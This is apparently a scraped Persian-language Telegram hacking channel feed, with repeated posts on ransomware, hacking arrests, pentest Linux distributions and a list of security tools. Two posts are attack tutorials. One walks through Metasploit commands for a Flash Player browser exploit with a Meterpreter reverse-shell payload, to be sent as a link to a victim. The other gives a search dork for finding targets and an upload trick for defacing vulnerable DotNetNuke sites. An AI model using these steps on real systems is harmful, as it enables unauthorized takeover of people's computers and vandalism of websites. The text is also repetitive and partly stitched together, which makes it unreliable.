Media is too big
VIEW IN TELEGRAM
# بررسی باج افزاری
در برابر هکری که از شما باجخواهی میکند، چه کار باید کرد؟
#باج_افزار🔱
#هک 💯
بکآپگیری از اطلاعات و به روز رسانی سیستمعامل کارهایی پیشگیرانه است.
@Kali_Linuxxx
در برابر هکری که از شما باجخواهی میکند، چه کار باید کرد؟
#باج_افزار🔱
#هک 💯
بکآپگیری از اطلاعات و به روز رسانی سیستمعامل کارهایی پیشگیرانه است.
@Kali_Linuxxx
This media is not supported in your browser
VIEW IN TELEGRAM
✔️ جوانی که با استفاده از ربات تلگرامی حدود ۲۱۰۰ حساب بانکی را #هک کرده بود در دام #پلیس_فتا افتاد.
@Kali_Linuxxx
@Kali_Linuxxx
💻#هک با لینک از طریق اسیب پذیری Adobe Flash Player
یکی از راه های نفوذ به به یک سیستم از طریق باز کردن لینک است برای درک بهتر به توضیحات زیر توجه کنید
اگر بخواهیم به سیستم یک کاربر که دارای سیستم عامل ویندوز است نفوذ کنیم راه های زیادی داریم
مانند استفاده از رات ها ، کیلاگر ها ، اسیب پذیری های سیستم عامل و … که این روش ها در اموزش های قبلی توضیح داده شده است
و میتوانید با کمی جستجو در سایت به ان ها دسترسی داشته باشید اما راه دیگری که در این اموزش به ان میپردازیم هک با لینک است
یعنی برای کاربر یک لینک الوده ارسال میکنیم تا با باز کردن ان به سیستم شخص دسترسی پیدا کنیم و بتوانیم دستورات خود را اجرا کنیم
این کار را با استفاده از ابزار معروف و محبوب #متاسپلویت در کالی لینوکس انجام میدهیم
⚠️#نفوذ با لینک به ویندوز
ابتدا Metasploit خود را اجرا کنید
msfconsole
وارد اکسپلویت مرورگر مورد نظر شوید
use exploit/multi/browser/adobe_flash_shader_drawing_fill
نکته : این اکسپلویت با استفاده از اسیب پذیری فلش پلیر کار میکند و باید حتما نسخه اسیب پذیر ان نصب باشد
با دستورات زیر ip خود را ست کنید
set SRVHOST 127.0.0.1
پورت مورد نظر خود را وارد کنید (به صورت پیشفرض ۸۰۸۰ میباشد)
set SRVPORT 6060
در صورتی که بخواهید میتوانید ssl را بر روی true بگذارید تا لینک با https باز شود
کرک فیسبوک با ابزار Facebash و امنیت
پیلود زیر را ست کنید
set PAYLOAD windows/meterpreter/reverse_tcp
حال با دستور run اکسپلویت را اجرا کنید
یک لینک به شما داده میشود که با ارسال به کاربر مورد نظر و اجرای ان دسترسی #meterpreter خواهید داشت
و میتوانید دستورات خود را برای کنترل سیستم از راه دور وارد نمایید
در صورتی که سیستم کاربر اسیب پذیر نباشد هک با لینک از این روش جوابگو نخواهد بود
روش های دیگری برای نفوذ با لینک وجود دارد مانند استفاده از ابزار beef که اموزش ویدیو ان را قرار داده ایم و میتوایند مشاهده کنید
@kali_linuxxx
یکی از راه های نفوذ به به یک سیستم از طریق باز کردن لینک است برای درک بهتر به توضیحات زیر توجه کنید
اگر بخواهیم به سیستم یک کاربر که دارای سیستم عامل ویندوز است نفوذ کنیم راه های زیادی داریم
مانند استفاده از رات ها ، کیلاگر ها ، اسیب پذیری های سیستم عامل و … که این روش ها در اموزش های قبلی توضیح داده شده است
و میتوانید با کمی جستجو در سایت به ان ها دسترسی داشته باشید اما راه دیگری که در این اموزش به ان میپردازیم هک با لینک است
یعنی برای کاربر یک لینک الوده ارسال میکنیم تا با باز کردن ان به سیستم شخص دسترسی پیدا کنیم و بتوانیم دستورات خود را اجرا کنیم
این کار را با استفاده از ابزار معروف و محبوب #متاسپلویت در کالی لینوکس انجام میدهیم
⚠️#نفوذ با لینک به ویندوز
ابتدا Metasploit خود را اجرا کنید
msfconsole
وارد اکسپلویت مرورگر مورد نظر شوید
use exploit/multi/browser/adobe_flash_shader_drawing_fill
نکته : این اکسپلویت با استفاده از اسیب پذیری فلش پلیر کار میکند و باید حتما نسخه اسیب پذیر ان نصب باشد
با دستورات زیر ip خود را ست کنید
set SRVHOST 127.0.0.1
پورت مورد نظر خود را وارد کنید (به صورت پیشفرض ۸۰۸۰ میباشد)
set SRVPORT 6060
در صورتی که بخواهید میتوانید ssl را بر روی true بگذارید تا لینک با https باز شود
کرک فیسبوک با ابزار Facebash و امنیت
پیلود زیر را ست کنید
set PAYLOAD windows/meterpreter/reverse_tcp
حال با دستور run اکسپلویت را اجرا کنید
یک لینک به شما داده میشود که با ارسال به کاربر مورد نظر و اجرای ان دسترسی #meterpreter خواهید داشت
و میتوانید دستورات خود را برای کنترل سیستم از راه دور وارد نمایید
در صورتی که سیستم کاربر اسیب پذیر نباشد هک با لینک از این روش جوابگو نخواهد بود
روش های دیگری برای نفوذ با لینک وجود دارد مانند استفاده از ابزار beef که اموزش ویدیو ان را قرار داده ایم و میتوایند مشاهده کنید
@kali_linuxxx
❤1
Forwarded from کالی لینوکس | Kali linux | ترفند | کامپیوتر | تکنولوژی (mohammadjn021)
۴_توزیع_برتر_لینوکس_برای_هک_و_تست.pdf
531.6 KB
🖥۴ توزیع #برتر #لینوکس برای #هک و تست نفوذ
توزیعهای تست نفوذ لینوکس، سیستمعاملهای متمرکز بر نفوذ و امنیت هستند که به هکرها کمک میکند نقاط ضعف و قدرت کامپیوترها یا شبکههای امن را شناسایی کنند. اصطلاح تست نفوذ برای افرادی که بهطور حرفهای درزمینهٔ امنیت فعالیت میکنند آشکار است. تست نفوذ با لینوکس بهترین گزینه برای هر محقق امنیتی یا هکر قانونمند است.
@kali_linuxxx
توزیعهای تست نفوذ لینوکس، سیستمعاملهای متمرکز بر نفوذ و امنیت هستند که به هکرها کمک میکند نقاط ضعف و قدرت کامپیوترها یا شبکههای امن را شناسایی کنند. اصطلاح تست نفوذ برای افرادی که بهطور حرفهای درزمینهٔ امنیت فعالیت میکنند آشکار است. تست نفوذ با لینوکس بهترین گزینه برای هر محقق امنیتی یا هکر قانونمند است.
@kali_linuxxx
❤1
This media is not supported in your browser
VIEW IN TELEGRAM
#hack #Router login page using #Kali_Linux
آموزش #هک کردن صفحه ورود به #روتر با استفاده از #کالی_لینوکس
@kali_linuxxx
آموزش #هک کردن صفحه ورود به #روتر با استفاده از #کالی_لینوکس
@kali_linuxxx
❤1
۴_توزیع_برتر_لینوکس_برای_هک_و_تست.pdf
531.6 KB
🖥۴ توزیع #برتر #لینوکس برای #هک و تست نفوذ
توزیعهای تست نفوذ لینوکس، سیستمعاملهای متمرکز بر نفوذ و امنیت هستند که به هکرها کمک میکند نقاط ضعف و قدرت کامپیوترها یا شبکههای امن را شناسایی کنند. اصطلاح تست نفوذ برای افرادی که بهطور حرفهای درزمینهٔ امنیت فعالیت میکنند آشکار است. تست نفوذ با لینوکس بهترین گزینه برای هر محقق امنیتی یا هکر قانونمند است.
@kali_linuxxx
توزیعهای تست نفوذ لینوکس، سیستمعاملهای متمرکز بر نفوذ و امنیت هستند که به هکرها کمک میکند نقاط ضعف و قدرت کامپیوترها یا شبکههای امن را شناسایی کنند. اصطلاح تست نفوذ برای افرادی که بهطور حرفهای درزمینهٔ امنیت فعالیت میکنند آشکار است. تست نفوذ با لینوکس بهترین گزینه برای هر محقق امنیتی یا هکر قانونمند است.
@kali_linuxxx
👍1
Forwarded from کالی لینوکس | Kali linux | ترفند | کامپیوتر | تکنولوژی (mohammadjn021)
This media is not supported in your browser
VIEW IN TELEGRAM
✔️ #هک_سایت با باگ
"DNN(Dot Net Nuke)"
خب ابتدا ما باید چک کنیم که سایت دارای باگ #DNN هست یا نه.
با سرچ کردن دورک زیر تارگتمونو پیدا میکنیم :
inurl:/portals/0
حالا اگر به لیست عکس های سایت خوردید یعنی سایت دارای این باگ هست و شما میتوانید عکسهایی که در سایت بکار رفته را تغییر دهید
برای دیدن عکس ها اینگونه عمل کنید :
http://site.com/portals/0/pic.png
نام عکس pic.png میباشد و شما اگر میخواهید عکسی بجای ان قرار گیرد نام عکس خودتون رو عوض کنید و بگذارید pic.png .
حالا این اکسپلویت رو بعد از ادرس سایت قرار بدید :
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
به این صورت :
http://site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
حالا یا این اکسپلویت عمل نمیکنه و یا عمل میکنه اگر عمل کرد :
سه گزینه برای شما بالا میاد که شما گزینه ی سوم یعنی (a File On Your Site) رو انتخاب میکنید ~_^
بعد از انتخاب این گزینه لینک رو با اسکریپت زیر جایگزین کنید :
javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
بعد از اجرای اسکریپت شما به قسمت اپلود هدایت میشید در اینجا اون عکسی رو که تغییر نام داده بودید اپلود کنید ^^/
حالا به صفحه ی اصلی سایت برید و Refresh کنید
♾ @kali_linuxxx
"DNN(Dot Net Nuke)"
خب ابتدا ما باید چک کنیم که سایت دارای باگ #DNN هست یا نه.
با سرچ کردن دورک زیر تارگتمونو پیدا میکنیم :
inurl:/portals/0
حالا اگر به لیست عکس های سایت خوردید یعنی سایت دارای این باگ هست و شما میتوانید عکسهایی که در سایت بکار رفته را تغییر دهید
برای دیدن عکس ها اینگونه عمل کنید :
http://site.com/portals/0/pic.png
نام عکس pic.png میباشد و شما اگر میخواهید عکسی بجای ان قرار گیرد نام عکس خودتون رو عوض کنید و بگذارید pic.png .
حالا این اکسپلویت رو بعد از ادرس سایت قرار بدید :
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
به این صورت :
http://site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
حالا یا این اکسپلویت عمل نمیکنه و یا عمل میکنه اگر عمل کرد :
سه گزینه برای شما بالا میاد که شما گزینه ی سوم یعنی (a File On Your Site) رو انتخاب میکنید ~_^
بعد از انتخاب این گزینه لینک رو با اسکریپت زیر جایگزین کنید :
javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
بعد از اجرای اسکریپت شما به قسمت اپلود هدایت میشید در اینجا اون عکسی رو که تغییر نام داده بودید اپلود کنید ^^/
حالا به صفحه ی اصلی سایت برید و Refresh کنید
♾ @kali_linuxxx
👍1
This media is not supported in your browser
VIEW IN TELEGRAM
#مانیتور سالن خبرنگاران در #پنتاگون در حین پخش زنده کنفرانس خبری #هک شد و عبارت hezbollah رو نمایش داد. مشخص نیست #CNN هک شده یا شبکه داخلی پنتاگون.
⭕️این مستند هست❌
@kali_linuxxx
⭕️این مستند هست❌
@kali_linuxxx
🔻 معرفی 10 برنامه کاربردی برتر در زمینه هک و امنیت
🔹 امروز قصد داریم به معرفی ۱۰ برنامه کاربردی برتر در زمینه هک و امنیت بپردازیم.
✅ این ابزارها عموما در کالی لینوکس بصورت پیش فرض قراردارند.
این برنامهها دقیقا صلاحهای افزادی هستند که در این حوزه کار میکنند و انجام هرکدام از عملیاتی که این ابزارها برای ما انجام میدهند، بدون استفاده از آنها امکان دارد چند روز، ماه یا حتی سال طول بکشد.
معرفی ابزار :
1. Nmap
2. Metasploit
3. John The Ripper
4. THC Hydra
5. Wireshark
6. Aircrack-ng
7. Maltego
8. Nessus
9. Acunetix
10. Social-Engineer Toolkit
➖➖➖➖➖➖
#ابزار #هک #امنیت #ابزار_هک #ابزار_امنیت
#pentestcore
🆔 @Kali_Linuxxx
🔹 امروز قصد داریم به معرفی ۱۰ برنامه کاربردی برتر در زمینه هک و امنیت بپردازیم.
✅ این ابزارها عموما در کالی لینوکس بصورت پیش فرض قراردارند.
این برنامهها دقیقا صلاحهای افزادی هستند که در این حوزه کار میکنند و انجام هرکدام از عملیاتی که این ابزارها برای ما انجام میدهند، بدون استفاده از آنها امکان دارد چند روز، ماه یا حتی سال طول بکشد.
معرفی ابزار :
1. Nmap
2. Metasploit
3. John The Ripper
4. THC Hydra
5. Wireshark
6. Aircrack-ng
7. Maltego
8. Nessus
9. Acunetix
10. Social-Engineer Toolkit
➖➖➖➖➖➖
#ابزار #هک #امنیت #ابزار_هک #ابزار_امنیت
#pentestcore
🆔 @Kali_Linuxxx
👍1
یک فرد استرالیایی ۵۸ ساله به علت دسترسی غیرمجاز و #هک کردن رایانه سرور یک شرکت تجاری محکوم شد.
یک فرد استرالیایی ۵۸ ساله به علت دسترسی غیرمجاز و هک کردن رایانه سرور یک شرکت تجاری محکوم شد.
به گزارش افتانا (پایگاه خبری امنیت فناوری اطلاعات)، پلیس ایالت نیوساوت ولز اعلام کرده که هکری را بعد از تحقیقات گسترده شناسایی کرده و وی بر اساس حکم دادگاه محکوم شدهاست. این استرالیایی ۵۸ ساله اهل ایالت نیوساوت ولز به علت دسترسی غیرمجاز و هک کردن رایانه سرور یک شرکت تجاری محکوم شد.
این فرد نخستینبار توسط شرکت امنیتی Cybercrime Squad شناسایی شد. وی تلاش کردهبود به اطلاعات ذخیره شده بر روی رایانه سرور یک شرکت استرالیایی تجارت الکترونیک دسترسی یابد. وی که از پیمانکاران شرکت یادشده بود پس از نفوذ به سرور مذکور اطلاعاتی را از روی آن سرقت کرده بود.
وی بعد از سرقت فایلهای مسروقه آنها را پاک کردهبود. تعداد این فایلها بیش از ۳۵۰ مورد برآورد شدهاست. نیروهای امنیتی محتوای رایانه این فرد را به دقت مورد بررسی قرار دادهاند. محاکمه این فرد برای تعیین مجازات قطعی طی هفتههای آینده ادامه مییابد.
@kali_linuxxx
یک فرد استرالیایی ۵۸ ساله به علت دسترسی غیرمجاز و هک کردن رایانه سرور یک شرکت تجاری محکوم شد.
به گزارش افتانا (پایگاه خبری امنیت فناوری اطلاعات)، پلیس ایالت نیوساوت ولز اعلام کرده که هکری را بعد از تحقیقات گسترده شناسایی کرده و وی بر اساس حکم دادگاه محکوم شدهاست. این استرالیایی ۵۸ ساله اهل ایالت نیوساوت ولز به علت دسترسی غیرمجاز و هک کردن رایانه سرور یک شرکت تجاری محکوم شد.
این فرد نخستینبار توسط شرکت امنیتی Cybercrime Squad شناسایی شد. وی تلاش کردهبود به اطلاعات ذخیره شده بر روی رایانه سرور یک شرکت استرالیایی تجارت الکترونیک دسترسی یابد. وی که از پیمانکاران شرکت یادشده بود پس از نفوذ به سرور مذکور اطلاعاتی را از روی آن سرقت کرده بود.
وی بعد از سرقت فایلهای مسروقه آنها را پاک کردهبود. تعداد این فایلها بیش از ۳۵۰ مورد برآورد شدهاست. نیروهای امنیتی محتوای رایانه این فرد را به دقت مورد بررسی قرار دادهاند. محاکمه این فرد برای تعیین مجازات قطعی طی هفتههای آینده ادامه مییابد.
@kali_linuxxx